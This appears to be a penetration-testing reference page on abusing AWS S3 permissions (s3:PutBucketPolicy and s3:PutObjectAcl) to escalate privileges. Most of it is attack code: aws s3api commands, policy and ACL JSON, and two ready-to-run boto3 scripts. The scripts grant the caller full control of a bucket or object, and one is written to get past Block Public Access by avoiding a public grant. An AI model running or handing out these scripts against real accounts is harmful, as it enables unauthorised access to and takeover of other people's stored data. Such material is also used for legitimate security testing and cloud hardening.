S3 - PrivEsc

Abusable AWS S3 permissions that can lead to compromise or privilege escalation

s3:PutBucketPolicy

An attacker who holds s3:PutBucketPolicy on a bucket can overwrite its bucket policy and grant their own principal full access (s3:*) to the bucket and every object in it. Note that put-bucket-policy replaces the whole policy rather than merging, so read the current one with get-bucket-policy first if you want to keep its statements (and avoid breaking whatever legitimately relies on them).

aws s3api put-bucket-policy --bucket <bucketName> --policy file://new-bucket-policy.json
# new-bucket-policy.json, adding s3:* for the attacker's principal (existing statements kept, the file replaces the whole policy)

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::123456789012:root"
            },
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::<bucketName>"
        },
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::123456789012:user/<userName>"
            },
            "Action": "s3:*",
            "Resource": [
                "arn:aws:s3:::<bucketName>",
                "arn:aws:s3:::<bucketName>/*"
            ]
        }
    ]
}
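The same escalation done programmatically, as an added example (not code from the original page): the function builds the new policy from whatever the bucket already has, appends an s3:* statement for the attacker's principal, and a second function checks offline that the result really grants full control. The Sid "AttackerFullControl", the bucket names and the principal ARNs in the comments are placeholders chosen for this example; the live call at the bottom uses the real boto3 get_bucket_policy/put_bucket_policy/get_caller_identity APIs and is only run when the script is invoked directly.

```python
import json
from typing import Optional

# Added example (not from the original page): build the policy that
# s3:PutBucketPolicy lets the attacker push. PutBucketPolicy replaces the whole
# document, so the function keeps every statement already on the bucket (to avoid
# breaking whatever legitimately uses it) and appends one statement granting the
# attacker's principal s3:* on the bucket and all of its objects.

ESCALATION_SID = "AttackerFullControl"  # hypothetical Sid chosen for this example


def _as_list(value):
    """IAM policy fields may be a single value or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def escalate_bucket_policy(existing: Optional[dict], principal_arn: str, bucket: str) -> dict:
    statements = [s for s in _as_list((existing or {}).get("Statement"))
                  if s.get("Sid") != ESCALATION_SID]      # idempotent on re-run
    statements.append({
        "Sid": ESCALATION_SID,
        "Effect": "Allow",
        # an IAM user/role ARN, or the arn:aws:sts::...:assumed-role/... ARN STS returns
        "Principal": {"AWS": principal_arn},
        "Action": "s3:*",
        # bucket-level actions (ListBucket, ...) bind to the bucket ARN, object-level
        # ones (GetObject, PutObject, ...) to bucket/*: both are needed for full control
        "Resource": [f"arn:aws:s3:::{bucket}", f"arn:aws:s3:::{bucket}/*"],
    })
    return {"Version": "2012-10-17", "Statement": statements}


def grants_full_control(policy: dict, principal_arn: str, bucket: str) -> bool:
    """Offline check: does a single Allow statement give principal_arn s3:* on both
    the bucket ARN and bucket/*? (Ignores Deny statements and Condition blocks.)"""
    needed = {f"arn:aws:s3:::{bucket}", f"arn:aws:s3:::{bucket}/*"}
    for s in _as_list(policy.get("Statement")):
        if s.get("Effect") != "Allow":
            continue
        principal = s.get("Principal", {})
        principals = _as_list(principal.get("AWS") if isinstance(principal, dict) else principal)
        if principal_arn not in principals:
            continue
        if "s3:*" in _as_list(s.get("Action")) and needed <= set(_as_list(s.get("Resource"))):
            return True
    return False


if __name__ == "__main__":
    # Live usage (needs boto3 and credentials): python3 this.py <bucketName>
    import sys
    import boto3
    from botocore.exceptions import ClientError

    bucket = sys.argv[1]
    s3 = boto3.client("s3")
    me = boto3.client("sts").get_caller_identity()["Arn"]   # always permitted
    try:
        current = json.loads(s3.get_bucket_policy(Bucket=bucket)["Policy"])
    except ClientError as e:
        # NoSuchBucketPolicy: nothing to preserve. AccessDenied (no s3:GetBucketPolicy):
        # the policy cannot be read, and the PUT below will wipe whatever is there.
        if e.response["Error"]["Code"] not in ("NoSuchBucketPolicy", "AccessDenied"):
            raise
        current = None
    new_policy = escalate_bucket_policy(current, me, bucket)
    assert grants_full_control(new_policy, me, bucket)
    s3.put_bucket_policy(Bucket=bucket, Policy=json.dumps(new_policy))
```

grants_full_control is deliberately narrow: it only recognises full control expressed in one statement and ignores Deny statements and conditions, which is enough to confirm the statement you just appended but is not a general policy evaluator.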

s3:PutObjectAcl

With this permission an attacker can rewrite the ACL of an object they could not otherwise read or modify and grant full control over that object to a principal of their choosing. It affects only the object named by --key, not the bucket, and the new ACL replaces the old one, so keep the owner's FULL_CONTROL grant. The example below grants FULL_CONTROL to the AuthenticatedUsers group, i.e. to anyone holding any AWS account. AWS treats a grant to AllUsers or AuthenticatedUsers as public, so the call is rejected when Block Public Access (BlockPublicAcls) is enabled, and any ACL other than bucket-owner-full-control is rejected on buckets whose Object Ownership is BucketOwnerEnforced (ACLs disabled, the default for new buckets). A grant to the attacker's own canonical user ID instead of a group is not considered public and avoids the first check.

aws s3api put-object-acl --bucket <bucketName> --key <objectKey> --access-control-policy file://object-acl-policy.json
# object-acl-policy.json, keeping the owner's grant and adding the Grantee:Group

{
    "Owner": {
        "DisplayName": "bucket-owner",
        "ID": "<bucketOwnerCanonicalId>"
    },
    "Grants": [
        {
            "Grantee": {
                "DisplayName": "bucket-owner",
                "ID": "<bucketOwnerCanonicalId>",
                "Type": "CanonicalUser"
            },
            "Permission": "FULL_CONTROL"
        },
        {
            "Grantee": {
                "Type": "Group",
                "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
            },
            "Permission": "FULL_CONTROL"
        }
    ]
}
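An added example (not code from the original page) that builds the object ACL for the PutObjectAcl abuse and checks whether S3 will classify it as public, which is what Block Public Access rejects. It shows both the group grant from the JSON above and the quieter alternative of granting to the attacker's own canonical user ID. The canonical IDs in the comments and test data are placeholders; the live section at the bottom uses the real boto3 list_buckets/get_object_acl/put_object_acl calls and runs only when the script is invoked directly.

```python
# Added example (not from the original page): build the object ACL that
# s3:PutObjectAcl lets the attacker push, and check whether S3 will treat it as
# "public" (any grant to the AllUsers or AuthenticatedUsers group), which is what
# Block Public Access's BlockPublicAcls setting rejects.

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTHENTICATED_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
PUBLIC_GROUPS = {ALL_USERS, AUTHENTICATED_USERS}


def build_object_acl(owner_id: str, grantee: dict, permission: str = "FULL_CONTROL") -> dict:
    """Return an AccessControlPolicy that keeps the owner's FULL_CONTROL (the PUT
    replaces the whole ACL, so dropping it would lock the owner out) and adds one
    grant. `grantee` is {"Type": "Group", "URI": ...} or
    {"Type": "CanonicalUser", "ID": ...}."""
    return {
        "Owner": {"ID": owner_id},
        "Grants": [
            {"Grantee": {"Type": "CanonicalUser", "ID": owner_id}, "Permission": "FULL_CONTROL"},
            {"Grantee": grantee, "Permission": permission},
        ],
    }


def acl_is_public(acl: dict) -> bool:
    """True if any grant targets AllUsers or AuthenticatedUsers: AWS's definition
    of a public ACL, and the condition BlockPublicAcls refuses to store."""
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            return True
    return False


def grants_to(acl: dict, canonical_id: str) -> set:
    """Permissions the ACL gives directly to one canonical user (group grants excluded)."""
    return {
        grant["Permission"]
        for grant in acl.get("Grants", [])
        if grant.get("Grantee", {}).get("Type") == "CanonicalUser"
        and grant["Grantee"].get("ID") == canonical_id
    }


if __name__ == "__main__":
    # Live usage (needs boto3 and credentials): python3 this.py <bucketName> <objectKey>
    import sys
    import boto3

    bucket, key = sys.argv[1], sys.argv[2]
    s3 = boto3.client("s3")
    # The caller's own canonical user ID is returned as Owner by ListBuckets
    # (needs s3:ListAllMyBuckets on the attacker's side).
    me = s3.list_buckets()["Owner"]["ID"]
    # The current owner comes from the existing ACL (needs s3:GetObjectAcl).
    owner = s3.get_object_acl(Bucket=bucket, Key=key)["Owner"]["ID"]
    # Grant to our own canonical ID: full control of the object without a
    # "public" grant, so BlockPublicAcls does not stop it.
    targeted = build_object_acl(owner, {"Type": "CanonicalUser", "ID": me})
    assert not acl_is_public(targeted)
    s3.put_object_acl(Bucket=bucket, Key=key, AccessControlPolicy=targeted)
```

Neither variant works on a bucket with Object Ownership set to BucketOwnerEnforced, where S3 ignores ACLs entirely; there only the bucket policy route above applies.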
